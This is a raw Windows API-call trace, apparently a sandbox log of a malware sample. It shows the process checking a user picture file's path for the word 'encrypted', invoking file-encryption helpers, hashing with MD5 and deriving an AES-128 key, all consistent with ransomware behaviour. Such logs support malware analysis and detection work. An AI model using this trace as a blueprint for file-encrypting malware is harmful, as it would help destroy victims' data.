[0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.162] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.162] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x33d385b0, ftLastWriteTime.dwHighDateTime=0x1d5b798, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 0x7c2240 [0040.162] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.162] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.162] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.162] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.163] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.163] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.163] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.163] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.163] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.163] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.163] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.163] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.163] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.163] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.163] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.164] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.164] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.164] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.165] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.165] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.165] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.165] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.165] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.165] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.165] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.165] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.166] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.166] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.166] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.166] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.166] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.166] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.166] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.166] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0040.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.167] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.167] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.167] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.167] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.168] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.168] 